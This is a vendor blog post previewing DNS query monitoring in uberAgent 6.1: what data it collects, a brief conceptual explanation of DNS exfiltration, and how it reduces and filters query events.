Skip to main content

vast limits GmbH and uberAgent are now part of Citrix, a business unit of Cloud Software Group. Learn more at Citrix.com.

uberAgent

uberAgent 6.1 Preview: DNS Query Monitoring

  • by Helge Klein
  • April 15, 2021

While we’re finalizing version 6.1 of our user experience monitoring & endpoint security analytics products uberAgent UXM and uberAgent ESA, let’s take a look at yet another cool new feature: DNS query monitoring.

What Is DNS Query Monitoring?

DNS query monitoring tracks all outgoing DNS requests on the endpoints where uberAgent is installed.

Which Data Is Collected by DNS Query Monitoring?

uberAgent DNS query monitoring collects the following information about every DNS query:

  • DNS name requested (e.g., www.example.com)
  • DNS response(s) (e.g., 10.2.3.4)
  • DNS response record type (e.g., A, AAAA, CNAME)
  • Name of the process making the query (e.g., chrome.exe)
  • GUID of the process making the query

DNS Query Monitoring Metadata

The process GUID can be used to uniquely identify the process instance making the DNS query. By looking the GUID up in other sourcetypes collected by uberAgent, a lot of metadata about the process making the DNS query is readily available, including, but not limited, to:

  • Command line
  • User account
  • Application the process is a part of
  • Elevation status
  • Parent process
  • Authenticode signature status (see announcement blog post)
  • Hash of the process image
  • Network communications (e.g., target hosts, ports, IPs, amount of data transferred)

Why Monitor DNS Queries?

DNS query monitoring is a useful technique in any IT security professional’s arsenal. This is because DNS is a base technology nearly all network communications rely on. Factoring in that DNS was designed when the internet was still deemed a safe and trustworthy place, there are multiple aspects of DNS that warrant close inspection.

Detecting Unusual or Malicious Domains

Any kind of advanced DNS analytics requires reliable information about which process on which endpoint tries to talk to which internet hosts. Some organizations want to be able to identify new domains, others want to be able to match DNS queries with lists of known-bad domains.

Detecting DNS Data Exfiltration

Data exfiltration via DNS queries has become quite common. It is a powerful technique for attackers because it does not require a direct network connection between the source and target hosts. Instead, it only requires a working DNS infrastructure.

How Does DNS Data Exfiltration Work?

DNS data exfiltration is a simple technique. It exploits the fact that the DNS query is passed to the entity controlling the target domain’s DNS by embedding the data to be exfiltrated into the DNS name to be resolved.

In a nutshell:

  1. Victim machine: DNS query for YOUR-EXFIL-DATA.domain.com
  2. DNS server for domain.com: a simple script strips YOUR-EXFIL-DATA from incoming queries

You can find a detailed description in the blog post DNS exfiltration of data: step-by-step simple guide.

Data Volume Reduction and DNS Query Filtering

On a large number of endpoints, the total count of DNS queries can be staggeringly high. We have taken measures and provide options to keep the data volume in check.

Folding Identical Queries Into a Single Event

Often, applications query DNS for the same name over and over again. uberAgent detects that repetition and folds identical queries into a single Splunk event. The query count is embedded in the event, too, of course, so that you don’t lose the query’s frequency.

Filtering Known-Good DNS Queries

In many cases, it’s OK to exclude high-volume low-risk queries. By doing that you lose a degree of visibility, potentially missing C2, but you also significantly reduce the number of events generated by DNS query monitoring.

uberAgent offers a sophisticated tool to fine-tune which DNS queries to exclude: event data filtering (EDF) on the endpoint. With EDF, the decision whether to exclude an event can be based on any combination of the event’s fields’ content. It allows you to filter events depending on the originating process, on the user account, or regex-match the DNS name queried. More information is available in the blog post announcing event data filtering.

uberAgent ESA Ships With Comprehensive Filtering Rules

Powerful filtering capabilities are great to have, but creating a production-grade set of filtering rules can be a lot of work. That’s why we did it for you! uberAgent ESA ships with one of the best DNS query filtering rulesets, the list compiled by SwiftOnSecurity as part of their Sysmon configuration.

About uberAgent

The uberAgent product family offers innovative digital employee experience monitoring and endpoint security analytics for Windows and macOS.

uberAgent UXM highlights include detailed information about boot and logon duration, application unresponsiveness detection, network reliability drill-downs, process startup duration, application usage metering, browser performance, web app metrics, and Citrix insights. All these varied aspects of system performance and reliability are smartly brought together in the Experience Score dashboard.

uberAgent ESA excels with a sophisticated Threat Detection Engine, endpoint security & compliance rating, the uAQL query language, detection of risky activity, DNS query monitoring, hash calculation, registry monitoring, and Authenticode signature verification. uberAgent ESA comes with Sysmon and Sigma rule converters, a graphical rule editor, and uses a simple yet powerful query language instead of XML.

About vast limits

vast limits GmbH is the company behind uberAgent, the innovative digital employee experience monitoring and endpoint security analytics product. vast limits’ customer list includes organizations from industries like finance, healthcare, professional services, and education, ranging from medium-sized businesses to global enterprises. vast limits’ network of qualified solution partners ensures best-in-class service and support anywhere in the world.

Comments

Your email address will not be published. Required fields are marked *